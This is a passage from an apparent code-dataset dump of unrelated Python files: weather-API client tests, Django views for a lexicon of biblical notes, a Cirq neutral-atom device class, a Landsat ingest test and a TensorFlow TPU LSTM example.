open(file) as json_file:\n data = json.load(json_file)\n\n return MockResponse(data, 200)\n\n\nclass TestMeasurement(TestCase):\n def test_measurement__str__(self):\n m = Measurement('temp', 13.04, 'C', '2021-01-14T21:00:00.000Z')\n self.assertEqual('temp: 13.04 C at 2021-01-14 21:00:00+00:00', str(m))\n\n m = Measurement('temp', 13.04, None, '2021-01-14T21:00:00.000Z')\n self.assertEqual('temp: 13.04 at 2021-01-14 21:00:00+00:00', str(m))\n\n\nclass TestResponse(TestCase):\n def test_get_measurements_error(self):\n with open(ERROR_FILE) as f:\n data = json.load(f)\n mock_response = MockResponse(data, 400)\n response = Response(mock_response, [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY])\n\n self.assertTrue(response.has_error)\n error = response.get_measurements()\n self.assertTrue(isinstance(error, Error))\n\n\nclass TestError(TestCase):\n def test_error(self):\n with open(ERROR_FILE) as f:\n data = json.load(f)\n\n error = Error(data)\n\n self.assertEqual(400, error.status_code)\n self.assertEqual('Message body content not allowed.', error.message)\n self.assertEqual('BadRequest', error.code)\n\n def test_error_str(self):\n with open(ERROR_FILE) as f:\n data = json.load(f)\n\n error = Error(data)\n expected_str = 'BadRequest (400): Message body content not allowed.'\n self.assertEqual(expected_str, str(error))\n\n\nclass TestClient(TestCase):\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_hourly(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n\n response = client.hourly(lat=lat, lon=lon, fields=fields)\n measurements = response.get_measurements()\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields([FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]),\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/forecast/hourly',\n 
params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n self.assertEqual(6, len(measurements))\n\n def test_hourly_invalid_start_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n start_time = 'yesterday'\n\n self.assertRaises(\n ValueError, client.hourly, lat, lon, fields, start_time\n )\n\n def test_hourly_invalid_end_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n start_time = 'now'\n end_time = 'tomorrow'\n\n self.assertRaises(\n ValueError, client.hourly, lat, lon, fields, start_time, end_time\n )\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_hourly_valid_end_time(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n start_time = 'now'\n end_time = '2021-01-14T21:00:00.000Z'\n\n response = client.hourly(lat, lon, fields, start_time, end_time)\n self.assertFalse(response.has_error)\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields([FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]),\n 'end_time': '2021-01-14T21:00:00.000Z',\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/forecast/hourly',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_nowcast(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [\n FIELD_TEMP,\n FIELD_DEW_POINT,\n FIELD_HUMIDITY,\n FIELD_WIND_SPEED,\n FIELD_WIND_GUST,\n FIELD_WIND_DIRECTION,\n FIELD_SUNRISE,\n FIELD_SUNSET,\n ]\n\n response = client.nowcast(lat=lat, lon=lon, fields=fields, timestep=timestep)\n measurements = response.get_measurements()\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'timestep': 30,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields(fields),\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/nowcast',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n # 13 timesteps, 8 measurements per timestep\n self.assertEqual(13 * 8, len(measurements))\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_nowcast_valid_end_time(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [FIELD_TEMP]\n start_time = 'now'\n end_time = '2021-01-14T21:00:00.000Z'\n\n response = client.nowcast(\n lat=lat, lon=lon, fields=fields, timestep=timestep,\n start_time=start_time, end_time=end_time\n )\n\n self.assertFalse(response.has_error)\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'timestep': 30,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields(fields),\n 'end_time': end_time\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/nowcast',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n def test_nowcast_invalid_start_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [FIELD_TEMP]\n start_time = 'yesterday'\n\n self.assertRaises(\n ValueError, client.nowcast, lat, 
lon, fields, timestep, start_time\n )\n\n def test_nowcast_invalid_end_time(self):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n timestep = 30\n fields = [FIELD_TEMP]\n start_time = 'now'\n end_time = 'tomorrow'\n\n self.assertRaises(\n ValueError, client.nowcast, lat, lon, fields,\n timestep, start_time, end_time\n )\n\n @mock.patch('climacell.api.requests.get', side_effect=mock_requests_get)\n def test_daily(self, mock_get):\n client = Client('apikey')\n lat = 52.446023244274045\n lon = 4.819207798979252\n fields = [FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]\n\n response = client.daily(lat=lat, lon=lon, fields=fields)\n measurements = response.get_measurements()\n\n expected_params = {\n 'lat': 52.446023244274045,\n 'lon': 4.819207798979252,\n 'start_time': 'now',\n 'unit_system': 'si',\n 'fields': join_fields([FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY]),\n }\n\n mock_get.assert_called_with(\n 'https://api.climacell.co/v3/weather/forecast/daily',\n params=expected_params,\n headers={'apikey': 'apikey'}\n )\n\n self.assertEqual(6, len(measurements))\n"} {"ext": "py", "sha": "1a30c9835e32ccd041b586efe95296a87922e426", "content": "import re\n\nfrom django.db.models import query, Min, F\nfrom django.views.generic import DetailView, ListView\nfrom django.views.generic.edit import UpdateView\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\nfrom django.utils.http import is_safe_url\nfrom django.http import QueryDict\nfrom django.conf import settings\n\nfrom .views import get_font\nfrom .models import Notes, Source, Target\nfrom .filters import NotesFilter, SourceFilter\n\n\nclass SourceListView(ListView):\n model = Source\n context_object_name = 'source'\n template_name = 'lexicon/list_source.html'\n paginate_by = 100\n\n def get_queryset(self):\n qs = super().get_queryset() # .values('id', 'token', 'lemma', 'morph', 'strongs_no_prefix', 'book', 'chapter', 'verse', 'notes')\n filtered = SourceFilter(self.request.GET, queryset=qs)\n return filtered.qs.distinct()[:100]\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['filter'] = SourceFilter(self.request.GET)\n return context\n\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['filter'] = SourceFilter(self.request.GET)\n \n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n # removing page here, might have to add pagination to this view in its own right\n if val and key != 'page':\n query_dict[key] = val\n \n context['query_dict'] = query_dict\n context['base_page'] = reverse('navigate_source') + '?' 
+ query_dict.urlencode()\n\n return context\n \n\nclass NavigateSource(SourceListView):\n paginate_by = 1\n template_name = 'lexicon/navigate_source.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n qs = self.get_queryset()\n # (<django.core.paginator.Paginator object at 0x7f1a605f99a0>, <Page 2 of 4>, <QuerySet [ix79: figs-euphemism]>, True)\n paginator = self.paginate_queryset(qs, self.get_paginate_by(qs))\n \n try:\n # gets the first element of the queryset of the selected page\n occurrence = paginator[2].first()\n except: \n # a fallback to show something, it will display the wrong text though (but the right note)\n occurrence = qs.first()\n\n context['occurrence'] = occurrence\n # context['source'] = Source.objects.filter(book=occurrence['book'], chapter=occurrence['chapter'], verse=occurrence['verse'])\n context['source'] = Source.objects.filter(book=occurrence.book, chapter=occurrence.chapter, verse=occurrence.verse)\n context['target'] = Target.objects.filter(book=occurrence.book, chapter=occurrence.chapter, verse=occurrence.verse)\n book_nr = int(occurrence.book.split('-')[0])\n if book_nr > 40:\n font = 'gk'\n else:\n font = 'hb'\n context['font'] = font\n\n # make sure you pass the GET parameters along\n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n if val and key != 'page':\n query_dict[key] = val\n\n context['query_dict'] = query_dict\n context['url'] = reverse('navigate_source') + '?' + query_dict.urlencode()\n context['base_page'] = reverse('list_source') + '?' + query_dict.urlencode()\n\n # prepare some nagivation\n page = paginator[1]\n if page.has_previous(): \n context['previous_page'] = page.previous_page_number()\n if page.has_next():\n context['next_page'] = page.next_page_number()\n\n return context\n\n\n\nclass NotesListView(ListView):\n model = Notes\n context_object_name = 'notes'\n template_name = 'lexicon/list_notes.html'\n paginate_by = 100\n\n def get_queryset(self):\n qs = super().get_queryset().annotate(min_source=Min('source__id')).distinct().order_by(F('min_source').asc(nulls_last=True))\n filtered = NotesFilter(self.request.GET, queryset=qs)\n return filtered.qs.distinct()\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['filter'] = NotesFilter(self.request.GET)\n \n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n # removing page here, might have to add pagination to this view in its own right\n if val and key != 'page':\n query_dict[key] = val\n \n context['base_page'] = reverse('navigate_notes') + '?' + query_dict.urlencode()\n\n return context\n\n\nclass NavigateNotes(NotesListView):\n paginate_by = 1\n template_name = 'lexicon/navigate_notes.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n\n '''\n Here's the magic:\n\n Although this is a LIST View it really is used to only display a SINGLE object\n because it is paginated by 1.\n \n This is done so the entire queryset can be filtered by the user and the user can then\n go through each item in said queryset. \n\n This means that we need to add the actual information based on the paginated queryset here\n and not just the basic queryset. 
\n '''\n qs = self.get_queryset()\n # (<django.core.paginator.Paginator object at 0x7f1a605f99a0>, <Page 2 of 4>, <QuerySet [ix79: figs-euphemism]>, True)\n paginator = self.paginate_queryset(qs, self.get_paginate_by(qs))\n \n try:\n # gets the first element of the queryset of the selected page\n note = paginator[2].first()\n except: \n # a fallback to show something, it will display the wrong text though (but the right note)\n note = qs.first()\n\n context['source'] = Source.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n book_nr = int(note.book.split('-')[0])\n if book_nr > 40:\n font = 'gk'\n else:\n font = 'hb'\n context['font'] = font\n context['source'].first().strongs_no_prefix\n context['target'] = Target.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n\n # make sure you pass the GET parameters along\n query_dict = QueryDict(mutable=True)\n for key,val in self.request.GET.items():\n if val and key != 'page':\n query_dict[key] = val\n\n context['url'] = reverse('navigate_notes') + '?' + query_dict.urlencode()\n context['base_page'] = reverse('list_notes') + '?' + query_dict.urlencode()\n\n # prepare some nagivation\n page = paginator[1]\n if page.has_previous(): \n context['previous_page'] = page.previous_page_number()\n if page.has_next():\n context['next_page'] = page.next_page_number()\n\n return context\n\n\nclass NotesDetailView(DetailView):\n model = Notes\n pk_url_kwarg = 'index'\n context_object_name = 'note'\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n note = self.object\n context['source'] = Source.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n book_nr = int(note.book.split('-')[0])\n if book_nr > 40:\n font = 'gk'\n else:\n font = 'hb'\n context['font'] = font\n context['source'].first().strongs_no_prefix\n context['target'] = Target.objects.filter(book=note.book, chapter=note.chapter, verse=note.verse)\n context['previous_note'] = Notes.objects.filter(index__lt=note.index).order_by('-index').first()\n context['next_note'] = Notes.objects.filter(index__gt=note.index).order_by('index').first()\n\n return context\n\n\nclass NotesUpdateView(UpdateView):\n model = Notes\n pk_url_kwarg = 'index'\n context_object_name = 'note'\n fields = 'supportreference annotation sourceword sourcewordoccurrence'.split()\n\n def get_success_url(self):\n next_url = self.request.GET.get('next', None)\n # do not accept any url\n if is_safe_url(next_url, allowed_hosts=settings.ALLOWED_HOSTS):\n return next_url"} {"ext": "py", "sha": "1a30ca4d0ebc2232b34fda07933d3d20d520defa", "content": "numbers = list()\nwhile True:\n num = int(input('Insert a number: '))\n numbers.append(num)\n cont = str(input('Do you want to continue? [y/n]: ')).lower().strip()[0]\n while cont not in 'yn':\n cont = str(input('Do you want to continue? 
[y/n]: ')).lower().strip()[0]\n if cont == 'n':\n break\nprint(f'You inserted a total of {len(numbers)} numbers.')\nprint(f'The numbers, in descending order, are: {sorted(numbers, reverse=True)}.')\nif 5 in numbers:\n print(f'The number 5 appear {numbers.count(5)} times.')\nelse:\n print('The number 5 don\\'t appear in the list.')\n"} {"ext": "py", "sha": "1a30cad8a194e64f268edd1e1c6065f329126e9e", "content": "# Copyright 2018 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport itertools\nimport collections\nfrom typing import Any, Iterable, cast, DefaultDict, TYPE_CHECKING, FrozenSet\nfrom numpy import sqrt\nfrom cirq import devices, ops, circuits, value\nfrom cirq.devices.grid_qubit import GridQubit\nfrom cirq.ops import raw_types\nfrom cirq.value import Duration\nfrom cirq.neutral_atoms import convert_to_neutral_atom_gates\n\nif TYPE_CHECKING:\n import cirq\n\n\ndef _subgate_if_parallel_gate(gate: 'cirq.Gate') -> 'cirq.Gate':\n \"\"\"Returns gate.sub_gate if gate is a ParallelGate, else returns gate\"\"\"\n return gate.sub_gate if isinstance(gate, ops.ParallelGate) else gate\n\n\ndef neutral_atom_gateset(max_parallel_z=None, max_parallel_xy=None):\n return ops.Gateset(\n ops.AnyIntegerPowerGateFamily(ops.CNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CZPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCZPowGate),\n ops.ParallelGateFamily(ops.ZPowGate, max_parallel_allowed=max_parallel_z),\n ops.ParallelGateFamily(ops.XPowGate, max_parallel_allowed=max_parallel_xy),\n ops.ParallelGateFamily(ops.YPowGate, max_parallel_allowed=max_parallel_xy),\n ops.ParallelGateFamily(ops.PhasedXPowGate, max_parallel_allowed=max_parallel_xy),\n ops.MeasurementGate,\n ops.IdentityGate,\n unroll_circuit_op=False,\n accept_global_phase_op=False,\n )\n\n\n@value.value_equality\nclass NeutralAtomDevice(devices.Device):\n \"\"\"A device with qubits placed on a grid.\"\"\"\n\n def __init__(\n self,\n measurement_duration: 'cirq.DURATION_LIKE',\n gate_duration: 'cirq.DURATION_LIKE',\n control_radius: float,\n max_parallel_z: int,\n max_parallel_xy: int,\n max_parallel_c: int,\n qubits: Iterable[GridQubit],\n ) -> None:\n \"\"\"Initializes the description of the AQuA device.\n\n Args:\n measurement_duration: the maximum duration of a measurement.\n gate_duration: the maximum duration of a gate\n control_radius: the maximum distance between qubits for a controlled\n gate. Distance is measured in units of the indices passed into\n the GridQubit constructor.\n max_parallel_z: The maximum number of qubits that can be acted on\n in parallel by a Z gate\n max_parallel_xy: The maximum number of qubits that can be acted on\n in parallel by a local XY gate\n max_parallel_c: the maximum number of qubits that can be acted on in\n parallel by a controlled gate. 
Must be less than or equal to the\n lesser of max_parallel_z and max_parallel_xy\n qubits: Qubits on the device, identified by their x, y location.\n Must be of type GridQubit\n\n Raises:\n ValueError: if the wrong qubit type is provided or if invalid\n parallel parameters are provided\n \"\"\"\n self._measurement_duration = Duration(measurement_duration)\n self._gate_duration = Duration(gate_duration)\n self._control_radius = control_radius\n self._max_parallel_z = max_parallel_z\n self._max_parallel_xy = max_parallel_xy\n if max_parallel_c > min(max_parallel_z, max_parallel_xy):\n raise ValueError(\n \"max_parallel_c must be less than or equal to the\"\n \"min of max_parallel_z and max_parallel_xy\"\n )\n self._max_parallel_c = max_parallel_c\n self.xy_gateset_all_allowed = ops.Gateset(\n ops.ParallelGateFamily(ops.XPowGate),\n ops.ParallelGateFamily(ops.YPowGate),\n ops.ParallelGateFamily(ops.PhasedXPowGate),\n unroll_circuit_op=False,\n accept_global_phase_op=False,\n )\n self.controlled_gateset = ops.Gateset(\n ops.AnyIntegerPowerGateFamily(ops.CNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCNotPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CZPowGate),\n ops.AnyIntegerPowerGateFamily(ops.CCZPowGate),\n unroll_circuit_op=False,\n accept_global_phase_op=False,\n )\n self.gateset = neutral_atom_gateset(max_parallel_z, max_parallel_xy)\n for q in qubits:\n if not isinstance(q, GridQubit):\n raise ValueError(f'Unsupported qubit type: {q!r}')\n self.qubits = frozenset(qubits)\n\n def qubit_set(self) -> FrozenSet['cirq.GridQubit']:\n return self.qubits\n\n def qubit_list(self):\n return [qubit for qubit in self.qubits]\n\n def decompose_operation(self, operation: ops.Operation) -> ops.OP_TREE:\n return convert_to_neutral_atom_gates.ConvertToNeutralAtomGates().convert(operation)\n\n def duration_of(self, operation: ops.Operation):\n \"\"\"Provides the duration of the given operation on this device.\n\n Args:\n operation: the operation to get the duration of\n\n Returns:\n The duration of the given operation on this device\n\n Raises:\n ValueError: If the operation provided doesn't correspond to a native\n gate\n \"\"\"\n self.validate_operation(operation)\n if isinstance(operation, (ops.GateOperation, ops.ParallelGateOperation)):\n if isinstance(operation.gate, ops.MeasurementGate):\n return self._measurement_duration\n return self._gate_duration\n\n def validate_gate(self, gate: ops.Gate):\n \"\"\"Raises an error if the provided gate isn't part of the native gate set.\n\n Args:\n gate: the gate to validate\n\n Raises:\n ValueError: If the given gate is not part of the native gate set.\n \"\"\"\n if gate not in self.gateset:\n if isinstance(gate, (ops.CNotPowGate, ops.CZPowGate, ops.CCXPowGate, ops.CCZPowGate)):\n raise ValueError('controlled gates must have integer exponents')\n raise ValueError(f'Unsupported gate: {gate!r}')\n\n def validate_operation(self, operation: ops.Operation):\n \"\"\"Raises an error if the given operation is invalid on this device.\n\n Args:\n operation: the operation to validate\n\n Raises:\n ValueError: If the operation is not valid\n \"\"\"\n if not isinstance(operation, (ops.GateOperation, ops.ParallelGateOperation)):\n raise ValueError(f'Unsupported operation: {operation!r}')\n\n # All qubits the operation acts on must be on the device\n for q in operation.qubits:\n if q not in self.qubits:\n raise ValueError(f'Qubit not on device: {q!r}')\n\n if operation not in self.gateset and not (\n operation in self.xy_gateset_all_allowed and len(operation.qubits) == 
len(self.qubits)\n ):\n raise ValueError(f'Unsupported operation: {operation!r}')\n\n if operation in self.controlled_gateset:\n if len(operation.qubits) > self._max_parallel_c:\n raise ValueError(\n 'Too many qubits acted on in parallel by a controlled gate operation'\n )\n for p in operation.qubits:\n for q in operation.qubits:\n if self.distance(p, q) > self._control_radius:\n raise ValueError(f\"Qubits {p!r}, {q!r} are too far away\")\n\n def validate_moment(self, moment: ops.Moment):\n \"\"\"Raises an error if the given moment is invalid on this device.\n\n Args:\n moment: The moment to validate\n\n Raises:\n ValueError: If the given moment is invalid\n \"\"\"\n super().validate_moment(moment)\n\n CATEGORIES = {\n 'Z': (ops.ZPowGate,),\n 'XY': (\n ops.XPowGate,\n ops.YPowGate,\n ops.PhasedXPowGate,\n ),\n 'controlled': (\n ops.CNotPowGate,\n ops.CZPowGate,\n ops.CCXPowGate,\n ops.CCZPowGate,\n ),\n 'measure': (ops.MeasurementGate,),\n }\n\n categorized_ops: DefaultDict = collections.defaultdict(list)\n for op in moment.operations:\n assert isinstance(op, (ops.GateOperation, ops.ParallelGateOperation))\n for k, v in CATEGORIES.items():\n assert isinstance(v, tuple)\n gate = _subgate_if_parallel_gate(op.gate)\n if isinstance(gate, v):\n categorized_ops[k].append(op)\n\n for k in ['Z', 'XY', 'controlled']:\n if len(set(_subgate_if_parallel_gate(op.gate) for op in categorized_ops[k])) > 1:\n raise ValueError(f\"Non-identical simultaneous {k} gates\")\n\n num_parallel_xy = sum([len(op.qubits) for op in categorized_ops['XY']])\n num_parallel_z = sum([len(op.qubits) for op in categorized_ops['Z']])\n has_measurement = len(categorized_ops['measure']) > 0\n controlled_qubits_lists = [op.qubits for op in categorized_ops['controlled']]\n\n if sum([len(l) for l in controlled_qubits_lists]) > self._max_parallel_c:\n raise ValueError(\"Too many qubits acted on by controlled gates\")\n if controlled_qubits_lists and (num_parallel_xy or num_parallel_z):\n raise ValueError(\n \"Can't perform non-controlled operations at same time as controlled operations\"\n )\n if self._are_qubit_lists_too_close(*controlled_qubits_lists):\n raise ValueError(\"Interacting controlled operations\")\n\n if num_parallel_z > self._max_parallel_z:\n raise ValueError(\"Too many simultaneous Z gates\")\n\n if num_parallel_xy > self._max_parallel_xy and num_parallel_xy != len(self.qubits):\n raise ValueError(\"Bad number of simultaneous XY gates\")\n\n if has_measurement:\n if controlled_qubits_lists or num_parallel_z or num_parallel_xy:\n raise ValueError(\"Measurements can't be simultaneous with other operations\")\n\n def _are_qubit_lists_too_close(self, *qubit_lists: Iterable[raw_types.Qid]) -> bool:\n if len(qubit_lists) < 2:\n return False\n if len(qubit_lists) == 2:\n a, b = qubit_lists\n return any(self.distance(p, q) <= self._control_radius for p in a for q in b)\n return any(\n self._are_qubit_lists_too_close(a, b) for a, b in itertools.combinations(qubit_lists, 2)\n )\n\n def can_add_operation_into_moment(self, operation: ops.Operation, moment: ops.Moment) -> bool:\n \"\"\"Determines if it's possible to add an operation into a moment.\n\n An operation can be added if the moment with the operation added is valid.\n\n Args:\n operation: The operation being added.\n moment: The moment being transformed.\n\n Returns:\n Whether or not the moment will validate after adding the operation.\n\n Raises:\n ValueError: If either of the given moment or operation is invalid\n \"\"\"\n if not 
super().can_add_operation_into_moment(operation, moment):\n return False\n try:\n self.validate_moment(moment.with_operation(operation))\n except:\n return False\n return True\n\n def validate_circuit(self, circuit: circuits.AbstractCircuit):\n \"\"\"Raises an error if the given circuit is invalid on this device.\n\n A circuit is invalid if any of its moments are invalid or if there is a\n non-empty moment after a moment with a measurement.\n\n Args:\n circuit: The circuit to validate\n\n Raises:\n ValueError: If the given circuit can't be run on this device\n \"\"\"\n super().validate_circuit(circuit)\n\n # Measurements must be in the last non-empty moment\n has_measurement_occurred = False\n for moment in circuit:\n if has_measurement_occurred:\n if len(moment.operations) > 0:\n raise ValueError(\"Non-empty moment after measurement\")\n for operation in moment.operations:\n if isinstance(operation.gate, ops.MeasurementGate):\n has_measurement_occurred = True\n\n def _value_equality_values_(self) -> Any:\n return (\n self._measurement_duration,\n self._gate_duration,\n self._max_parallel_z,\n self._max_parallel_xy,\n self._max_parallel_c,\n self._control_radius,\n self.qubits,\n )\n\n def __repr__(self) -> str:\n return (\n 'cirq.NeutralAtomDevice('\n f'measurement_duration={self._measurement_duration!r}, '\n f'gate_duration={self._gate_duration!r}, '\n f'max_parallel_z={self._max_parallel_z!r}, '\n f'max_parallel_xy={self._max_parallel_xy!r}, '\n f'max_parallel_c={self._max_parallel_c!r}, '\n f'control_radius={self._control_radius!r}, '\n f'qubits={sorted(self.qubits)!r})'\n )\n\n def neighbors_of(self, qubit: 'cirq.GridQubit') -> Iterable['cirq.GridQubit']:\n \"\"\"Returns the qubits that the given qubit can interact with.\"\"\"\n possibles = [\n GridQubit(qubit.row + 1, qubit.col),\n GridQubit(qubit.row - 1, qubit.col),\n GridQubit(qubit.row, qubit.col + 1),\n GridQubit(qubit.row, qubit.col - 1),\n ]\n return [e for e in possibles if e in self.qubits]\n\n def distance(self, p: 'cirq.Qid', q: 'cirq.Qid') -> float:\n p = cast(GridQubit, p)\n q = cast(GridQubit, q)\n return sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n\n def __str__(self) -> str:\n diagram = circuits.TextDiagramDrawer()\n\n for q in self.qubits:\n diagram.write(q.col, q.row, str(q))\n for q2 in self.neighbors_of(q):\n diagram.grid_line(q.col, q.row, q2.col, q2.row)\n\n return diagram.render(horizontal_spacing=3, vertical_spacing=2, use_unicode_characters=True)\n"} {"ext": "py", "sha": "1a30cb28cfe924fdc6b5e5a99d42e03591c0a0d2", "content": "\"\"\"Tests related to creating ingest definition\"\"\"\n\nimport json\nimport os\nimport unittest\n\nfrom rf.models import Scene\nfrom rf.ingest.landsat8_ingest import get_landsat8_layer\n\nclass Landsat8LayerTestCase(unittest.TestCase):\n \"\"\"Test that we can create a layer from Landsat 8 scenes\"\"\"\n\n def setUp(self):\n cwd = os.path.abspath(os.path.dirname(__file__))\n scene_path = os.path.join(cwd, 'data', 'scene.json')\n with open(scene_path) as fh:\n self.scene = Scene.from_dict(json.load(fh))\n\n def test_create_layer(self):\n \"\"\"Minimal test to verify that a layer can be created\"\"\"\n layer = get_landsat8_layer(self.scene)\n num_sources = len(layer.sources)\n self.assertEqual(\n num_sources, 11, 'Found {} sources, expected 11'.format(num_sources)\n )\n\n\n"} {"ext": "py", "sha": "1a30cc3695724c9c29237602f5781066bcb092bd", "content": "# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file 
except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport argparse\nimport numpy as np\nimport tensorflow as tf\n\nNUM_CLASSES = 10\nEMBEDDING_DIM = 7\n\n\ndef model_fn(features, labels, mode, params):\n # build model\n global_step = tf.train.get_global_step()\n\n embedding_table = tf.get_variable('embedding_table', shape=(NUM_CLASSES, EMBEDDING_DIM), dtype=tf.float32)\n\n embeddings = tf.nn.embedding_lookup(embedding_table, features)\n\n # lstm model\n batch_size = params['train_batch_size']\n sequence_length = params['sequence_length']\n\n cell = tf.nn.rnn_cell.BasicLSTMCell(EMBEDDING_DIM)\n outputs, final_state = tf.nn.dynamic_rnn(cell, embeddings, dtype=tf.float32)\n\n # flatten the batch and sequence dimensions\n flattened = tf.reshape(outputs, (-1, EMBEDDING_DIM))\n flattened_logits = tf.layers.dense(flattened, NUM_CLASSES)\n\n logits = tf.reshape(flattened_logits, (-1, sequence_length, NUM_CLASSES))\n\n predictions = tf.multinomial(flattened_logits, num_samples=1)\n loss = None\n train_op = None\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n # define loss\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits))\n\n # define train_op\n optimizer = tf.train.RMSPropOptimizer(learning_rate=0.05)\n\n # wrapper to make the optimizer work with TPUs\n if params['use_tpu']:\n optimizer = tf.contrib.tpu.CrossShardOptimizer(optimizer)\n\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n if params['use_tpu']:\n # TPU version of EstimatorSpec\n return tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=loss,\n train_op=train_op)\n else:\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=loss,\n train_op=train_op)\n\n\ndef train_input_fn(params={}):\n # make some fake data of labels\n data_length = 100\n x = np.random.randint(0, NUM_CLASSES, data_length)\n y = np.random.randint(0, NUM_CLASSES, data_length)\n\n x_tensor = tf.constant(x, dtype=tf.int32)\n y_tensor = tf.constant(y, dtype=tf.int32)\n\n dataset = tf.data.Dataset.from_tensors((x_tensor, y_tensor))\n dataset = dataset.repeat()\n\n # TPUs need to know the full shape of tensors\n # so we use a fixed sequence length\n sequence_length = params.get('sequence_length', 5)\n\n def get_sequences(x_tensor, y_tensor):\n index = tf.random_uniform([1], minval=0, maxval=data_length-sequence_length, dtype=tf.int32)[0]\n\n x_sequence = x_tensor[index:index+sequence_length]\n y_sequence = y_tensor[index:index+sequence_length]\n\n return (x_sequence, y_sequence)\n\n dataset = dataset.map(get_sequences)\n\n # TPUEstimator passes params when calling input_fn\n batch_size = params.get('train_batch_size', 16)\n dataset = dataset.batch(batch_size, drop_remainder=True)\n\n # TPUs need to know all dimensions when the graph is built\n # Datasets know the batch size only when the graph is run\n def set_shapes(features, labels):\n features_shape = features.get_shape().merge_with([batch_size, sequence_length])\n labels_shape = labels.get_shape().merge_with([batch_size, sequence_length])\n\n features.set_shape(features_shape)\n 
